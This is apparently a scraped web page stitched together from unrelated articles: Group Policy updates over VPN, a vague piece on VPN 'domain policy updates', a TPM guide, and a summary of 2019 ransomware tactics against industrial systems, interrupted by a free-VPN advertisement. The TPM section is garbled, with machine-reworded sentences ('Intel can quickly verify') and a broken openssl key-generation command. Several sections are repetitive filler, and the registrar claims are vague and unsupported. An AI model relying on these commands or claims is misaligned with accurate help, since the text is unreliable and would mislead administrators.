Lastly, consult with your IT department or network administrator for further assistance. They can provide insight into specific network configurations or policies that may affect GPUpdate over VPN connections and offer tailored solutions to address the issue.

Domain policy update VPN

Attention all users of VPN services! A recent domain policy update regarding VPNs may impact your online browsing experience. It is crucial to stay informed about these changes to ensure secure and uninterrupted access to your preferred VPN services.

In light of increasing cybersecurity threats and data privacy concerns, many domain registrars are implementing stricter policies for websites offering VPN services. These policies aim to enhance user safety and prevent misuse of VPNs for illegal activities. As a result, VPN service providers must comply with these updated domain policies to maintain their online presence.

Users of VPN services should be aware of these domain policy updates to avoid any disruptions in their VPN access. It is recommended to regularly check for any notifications or alerts from your VPN provider regarding changes in domain policies. Failure to adhere to these updated policies may result in domain suspension or restrictions, leading to potential service interruptions.

To ensure smooth and continuous VPN usage, users are advised to review and understand the domain policy updates issued by their VPN service providers. By staying informed and compliant with these policies, users can safeguard their online privacy and security while enjoying the benefits of VPN services.

In conclusion, staying informed about domain policy updates related to VPN services is essential for maintaining secure and reliable online browsing. By understanding and adhering to these policies, users can continue to enjoy the advantages of VPN technology without any disruptions. Stay updated, stay secure!

Troubleshoot GPUpdate VPN conflict

When using VPN (Virtual Private Network) services, users may encounter conflicts with the GPUpdate utility, which is used to refresh Group Policy settings on Windows systems. These conflicts can arise due to various reasons and can hinder the proper functioning of both the VPN and GPUpdate. Here are some troubleshooting steps to resolve GPUpdate VPN conflicts:

Check VPN Configuration: Ensure that the VPN configuration does not interfere with the network settings required for GPUpdate. Some VPNs may block certain ports or protocols used by GPUpdate, causing conflicts.

Temporarily Disable VPN: Temporarily disable the VPN connection before running GPUpdate. This allows GPUpdate to communicate directly with the domain controller without any interference from the VPN.

Modify VPN Settings: If possible, modify the VPN settings to allow traffic related to GPUpdate. This may involve configuring exceptions or whitelisting specific IP addresses or domains used by the domain controller.

Update VPN Client: Ensure that the VPN client software is up to date. Sometimes, outdated VPN clients may have compatibility issues with GPUpdate or other system components.

Check Firewall Settings: Verify that the firewall settings on the local machine and the network firewall do not block the necessary traffic for GPUpdate. Adjust firewall rules if needed to allow GPUpdate traffic.

Review Group Policy Settings: Review the Group Policy settings to ensure that there are no conflicting policies that could be causing issues with GPUpdate. Sometimes, conflicting policies may prevent GPUpdate from applying changes successfully.

Consult VPN Provider: If the issue persists, contact the VPN service provider for further assistance. They may have specific recommendations or solutions tailored to their VPN software.

By following these troubleshooting steps, users can effectively resolve conflicts between GPUpdate and VPN services, ensuring smooth operation and proper application of Group Policy settings.

TPM: A Guide to Understanding Your Computer’s Security Chip

What is Trusted Platform Module (TPM) A Trusted Platform Module (TPM) is a secure cryptoprocessor chip on your computer’s motherboard.

First Contact TPM for Windows The BitLocker drive encryption, the Virtual Smart Card features, and the Crypto Provider are among the security components of the Microsoft Windows operating system that depend on TPM-based capabilities. In fact, Trusted Platform Module 2.0 needs to be activated in ALL desktop and server variants of Windows 10 and 11. By using remote attestation in conjunction with the system’s Trusted Platform Module to allow Measured Boot, the configuration of the system is protected from undetectable threats like rootkits.

On Intel’s Windows machine, Intel can quickly verify some Trusted Platform Module details by navigating to the Security Devices area of the Device Manager screen.

TPM details by navigating to the Security Devices area of the Device Manager screen.

Now let’s engage with it. Now that a terminal window is open, let’s extract some basic system data. There are numerous powershell cmdlets available in Windows that can be used right away.

Get-Tpm retrieves the following data from the module:

Intel can also use this information to deduce some details about the underlying system: For instance, if the platform is equipped with and employing Platform Trust Technologies (PTT), “Intel” will appear in the manufacturer section here. Here, a Trusted Platform Module from the company STM is being used.

Intel must communicate with Windows Core Security features, namely the Trusted Platform Module Base Services software component and related API, in order to utilise the Trusted Platform Module from an application standpoint. Microsoft offers tools and wrappers to facilitate the integration of these processes more quickly.

Then intel will begin examining these after that.

Linux-based TPM First Contact Working with keys securely across any TPM 2.0 compatible module is made feasible by a set of standardised commands and libraries that enable the use of TPMs for key loading and storage in Linux.

At a high level, you can check if a TPM is present in the system by running the following command in the system log: dmesg | grep -i tpm.

Here is a step-by-step guide to several fundamental Linux system interactions: Required conditions: Install a TPM 2.0 chip on the target machine. Install TPM 2.0 software. These packages differ per Linux distribution.The tpm2-tools and tpm2-tss packages are popular. Initialise TPM: Initialise the TPM before using it. Initialise the TPM with tpm2 startup. Establish an Application Key: Create a key that is unique to your application and that you wish to keep in the TPM.You can use a software library like OpenSSL or a Trusted Platform Module library like tpm2-tools to generate this key.

The following is one method of generating an RSA keypair: RSA algorithm -out appkey.pem -openssl genpkey

Fill the TPM with the Key: To load your application-specific key into the TPM, use the TPM 2.0 tools. For this, you’ll usually use the tpm2 load command: tpm2 load -C appkey.pub -r appkey.priv -u context.out This command saves the context of the key in the context.out file and loads it into the TPM. This context is necessary for using the key later on. Apply the resident key (TPM): You can use this commands or libraries such as tpm2-tss to execute cryptographic operations on the TPM-resident key when your programme needs to access it. To sign data using the TPM key, for instance, run the following commands: tpm2 sign -c context.out -g sha256 -m data.txt -s signature.bin Using the TPM-resident key, this command signs the data and stores the signature in signature.bin. Unload the Key (Optional): You can use the tpm2 flushcontext command to unload the TPM-resident key if you no longer require it: tpm2 flushcontext -c context.out. This releases the key’s associated TPM resources. Shutdown and Cleanup (Optional): You can use the tpm2 shutdown command to terminate the Trusted Platform Module once your programme has finished utilising it. Analysing TPM 2.0 thoroughly Advancements in Computer Security Trusted Platform Module (TPM) 2.0 hardware boosts computer security. It protects your system and encryption keys as a secure cryptoprocessor. Essential Features: Cryptographic Key Management: TPM 2.0 securely produces, stores, and utilises keys.Data encryption, digital signatures, and secure communication require these keys. TPM 2.0’s hardware isolation makes key theft and tampering much harder than with software-based systems.

Platform Integrity Validation: Trusted Platform Module 2.0 monitors firmware and other critical software. It looks for any unauthorised changes that might point to malware or efforts at tampering. TPM 2.0 can protect your data by stopping the system from booting if something suspect is found.

Platform Attestation: The firmware and software of your system can be reported on using Trusted Platform Module 2.0. Other security measures or reliable organisations can use these reports, known as attestations, to confirm the integrity of the system. This is useful for secure boot environments and for assessing a system’s health prior to allowing access to resources that are sensitive.

Benefits of TPM 2.0: BitLocker Drive TPM 2.0 securely holds encryption keys, strengthening encryption and other functions. This makes data access tougher for unauthorised parties, even if they reach your device.

Enhanced Platform Security: Your system will boot with authentic, unaltered firmware and software thanks to the platform integrity checks. This lessens the chance that malware will compromise your system remotely.

More Robust User Authentication: Trusted Platform Module 2.0 can be paired with Windows Hello and other comparable technologies to provide more reliable two-factor authentication. By requiring a physical factor in addition to a password, like a fingerprint or facial recognition, this strengthens security. TPM 2.0, Win11:

Microsoft says Windows 11 needs Trusted Platform Module 2.0. This shows how crucial hardware-based security capabilities are becoming in the battle against more complex assaults. The good news is that TPM 2.0 functionality is probably pre-installed on the majority of PCs made in the last few years. It may, however, be inactive by default in the BIOS settings.

Beyond the Fundamentals: Flexibility: TPM 2.0 takes a “library” approach, in contrast to its predecessor. This implies that Trusted Platform Module 2.0 features can be selected by manufacturers based on what best meets their device and security requirements. Wider acceptance across multiple platforms from laptops to embedded systems is made possible by this versatility.

Future-Proofing: Expansion is a key design principle of TPM 2.0. As security risks evolve, it supports the installation of new functions and algorithms. This guarantees that Trusted Platform Module 2.0 will continue to be applicable and useful when new security threats arise.

Read more on Govindhtech.com

does group policy update over vpn

🔒🌍✨ Get 3 Months FREE VPN - Secure & Private Internet Access Worldwide! Click Here ✨🌍🔒

does group policy update over vpn

Group Policy update process

Group Policy is a vital component in the management of Windows-based networks, allowing administrators to enforce settings and configurations across multiple machines efficiently. However, ensuring that these policies are up to date across all networked devices is crucial for maintaining security and compliance standards. The Group Policy update process facilitates this by ensuring that policy changes and updates are propagated throughout the network effectively.

The Group Policy update process typically occurs automatically in Windows environments, with machines periodically checking for updates based on a predetermined schedule. By default, this update interval is every 90 minutes, with a randomized offset of up to 30 minutes to prevent all machines from updating simultaneously and overwhelming the network.

When a Group Policy update is triggered, the client machine contacts a domain controller to retrieve the latest policies. This process involves several steps, including determining which policies are applicable to the machine based on its membership in Active Directory groups, retrieving the policies from the appropriate Group Policy Objects (GPOs), and applying them to the system.

Administrators can also force a Group Policy update manually using the "gpupdate" command, which triggers an immediate refresh of policy settings on the local machine. This can be useful when changes need to be applied immediately, such as in the case of security updates or configuration changes.

In addition to regular updates, Group Policy settings can also be enforced or disabled at specific intervals using tools like the Group Policy Management Console (GPMC) or PowerShell commands, giving administrators fine-grained control over policy deployment.

In conclusion, the Group Policy update process plays a vital role in ensuring that networked devices remain compliant with organizational standards and security requirements. By automating the distribution of policy changes and updates, administrators can maintain a secure and well-managed IT environment.

VPN connectivity for Group Policy

Title: Enhancing Group Policy Security with VPN Connectivity

In today's digital landscape, where remote work is increasingly prevalent, securing network connectivity is paramount for organizations. Group Policy, a feature of Microsoft Windows, offers centralized management and configuration of computer and user settings. However, ensuring the security of Group Policy communications, especially across distributed networks, requires robust measures. This is where Virtual Private Network (VPN) connectivity comes into play.

VPNs establish secure, encrypted connections over public networks, such as the internet, enabling remote users to access resources as if they were directly connected to the private network. By integrating VPN connectivity with Group Policy, organizations can extend the reach of their security policies to remote endpoints, enhancing overall network security.

One key benefit of using VPNs with Group Policy is the ability to enforce consistent security settings across all endpoints, regardless of their location. This ensures that devices connecting from remote locations adhere to the same security standards as those within the corporate network, mitigating the risk of unauthorized access and data breaches.

Additionally, VPNs provide an extra layer of encryption for Group Policy communications, safeguarding sensitive information from potential interception or tampering by malicious actors. This is especially crucial when transmitting sensitive data, such as login credentials or configuration settings, over untrusted networks.

Moreover, VPNs offer granular control over access permissions, allowing administrators to define which users or groups can connect to the network remotely and what resources they can access. This ensures that only authorized personnel can modify Group Policy settings, reducing the risk of unauthorized changes that could compromise network security.

In conclusion, integrating VPN connectivity with Group Policy enhances the security and manageability of distributed networks. By extending security policies to remote endpoints and encrypting communications, organizations can maintain a secure computing environment while accommodating the growing trend of remote work.

Group Policy settings synchronization

Group Policy settings synchronization is a crucial aspect of managing networks effectively within organizations. It involves ensuring that all the Group Policy settings, which define how certain computer settings and configurations are applied, are synchronized across all devices within a network. This synchronization process helps in maintaining consistency and uniformity in the network environment, ensuring that all devices adhere to the same security protocols and operational standards.

By synchronizing Group Policy settings, administrators can centrally manage and enforce security policies, user settings, software deployment configurations, and other important parameters for all devices in the network. This simplifies the administration process, reduces the likelihood of configuration errors, and enhances overall network security.

One of the key advantages of Group Policy settings synchronization is its ability to streamline the management of a large number of devices efficiently. This centralized approach enables administrators to make changes to Group Policy settings in one location and have those changes automatically applied to all connected devices. This not only saves time and effort but also helps in maintaining a standardized and secure network environment.

Additionally, Group Policy settings synchronization plays a vital role in ensuring compliance with regulatory requirements and internal security policies. By enforcing consistent settings across all network devices, organizations can minimize security vulnerabilities and mitigate potential risks associated with non-compliance.

In conclusion, Group Policy settings synchronization is indispensable for organizations looking to establish a well-managed, secure, and efficient network environment. By ensuring that all devices are consistently configured and updated according to the defined policies, administrators can effectively safeguard their network infrastructure and data assets.

Group Policy application over VPN

Group Policy application over VPN is a critical aspect of network management for organizations with remote or distributed workforce. Group Policy allows administrators to enforce specific settings, restrictions, and configurations across all devices connected to the network. However, ensuring the seamless application of Group Policies to devices accessing the network via VPN presents unique challenges.

One of the primary challenges is ensuring consistent connectivity between the remote device and the domain controller responsible for Group Policy administration. VPN connections rely on stable network connections, which may not always be guaranteed, especially when users are accessing the network from diverse locations with varying internet quality.

To address this challenge, administrators can implement strategies such as optimizing VPN configurations for reliability and performance. This may involve using VPN protocols that are known for their stability, implementing redundant VPN gateways, or deploying technologies like SD-WAN to prioritize VPN traffic and mitigate latency issues.

Another consideration is the impact of latency on Group Policy processing. Since Group Policy relies on communication between the client device and the domain controller, high latency connections can lead to delays in policy application. Administrators can mitigate this by optimizing Group Policy processing, such as minimizing the number of policies applied or leveraging technologies like caching to reduce the reliance on continuous communication with the domain controller.

Furthermore, security considerations are paramount when applying Group Policies over VPN. Administrators must ensure that VPN connections are secure and encrypted to protect sensitive Group Policy data from interception or tampering by unauthorized parties.

In conclusion, Group Policy application over VPN requires careful planning and implementation to ensure consistent connectivity, optimal performance, and robust security. By addressing challenges such as network reliability, latency, and security, organizations can effectively manage and enforce Group Policies across their remote workforce.

Remote network policy updates

Remote network policy updates are crucial for businesses operating in today's digital world. With remote work becoming more common, ensuring that network policies are up to date is essential to maintaining a secure and efficient network infrastructure.

Updating network policies remotely involves making changes to the rules and procedures that govern network access and usage. This can include updating security protocols, access controls, and bandwidth management rules. By implementing timely updates, organizations can mitigate security risks, ensure compliance with industry regulations, and improve network performance.

One of the key benefits of remote network policy updates is the ability to quickly respond to emerging threats and vulnerabilities. With cyber threats constantly evolving, businesses need to stay proactive in updating their network policies to protect sensitive data and prevent unauthorized access.

Furthermore, remote network policy updates allow organizations to adapt to changing business needs and technological advancements. As businesses scale and adopt new technologies, network policies may need to be updated to accommodate these changes.

To effectively manage remote network policy updates, businesses should implement a centralized policy management solution that allows for seamless deployment and monitoring of policy changes. Automation tools can also help streamline the update process and ensure consistency across the network.

In conclusion, remote network policy updates are essential for maintaining a secure and efficient network infrastructure in today's digital landscape. By staying proactive and implementing timely updates, businesses can safeguard their data, optimize network performance, and adapt to evolving business requirements.

Tactics Techniques and Procedures Cyber Security

The estimated number of published OT vulnerabilities that are actuality exploitable varies. A survey by researchers from Virginia Tech and other research institutes estimating that “5.5% of all 100,000+ vulnerabilities contained in the National Vulnerability Database have been exploited in the wild.

The European Union Agency for Cybersecurity (ENISA) claims that “at least 8.65% of vulnerabilities are exploitable… this number is expected to be higher due to zero-day exploits and the incompleteness of the datasets”. It should be noted that this figure refers to both OT and IT vulnerabilities.

Tactics Techniques and Procedures

Many 2019 reports point out a rise in masquerading. This is done, for example, to steal log-on IDs and passwords or find security gaps in programs. In addition, we’ve also observed a rise in the use of SMB protocol exploitation.

According to Crowdstrike’s report, there has been a rise in malware-free attacks. Malware-free attacks are attacks where the initial tactic did not result in a file or file fragment being written to disk, for example attacks where code executes from memory or where stolen credentials are used for remote login using known tools.

“Hands-on-keyboard” techniques have also been on the rise, including command-line interface attacks, PowerShell and credential theft, credential dumping, and account discovery.

The hacking “industry” is transitioning to an outsourced service model. This model includes Ransomware-as-a-service (RaaS) (e.g. LockerGoga that attacked ICS manufacturing facilities), Malware-as-a-service (MaaS), and Download-as-a-Service (DaaS).

Finally, there has been a prolific use of network shell commands, RDP, RATs, Active directory scanners, network protocol vulnerability exploitation, non-secure DNS manipulation (DNS tunneling, Anchoring), and RCE remote code execution.

2019 OT Advisories and Increase in Attacks

All the 2019 reports I have read were unequivocal about the rise of attacks on the ICS sector. Moreover, in a recent survey of OT leaders, 77% of respondents said they had experienced a malware intrusion in the past year, and half experienced between three and ten. Tactics Techniques and Procedures Cyber Security

The Tactics, Techniques and Procedures (TTP’s) aimed at the ICS environment that made the headlines were BitPaymer, Ryuk, and LockerGoga.

BitPaymer – BitPaymer is a Ransomware that collects data such as Active Directory (AD) credentials, private user data and lists of all computers on the network. BitPaymer uses the PowerShell Empire tool for lateral movement in the network.

Ryuk – Ryuk is a ransomware that resembles and is probably somewhat based on BitPaymer. It uses TrickBot modules (e.g. pwgrab) to execute credentials theft, and PowerShell Empire traffic for reconnaissance and lateral movement.

LockerGoga – uses the PsExec (a sys-admin tool) to perform reconnaissance and lateral movement in the network. Since LockerGoga neither gives the victims a chance to recover the files nor specifically asks for payment, it is likely intended to disrupt operations.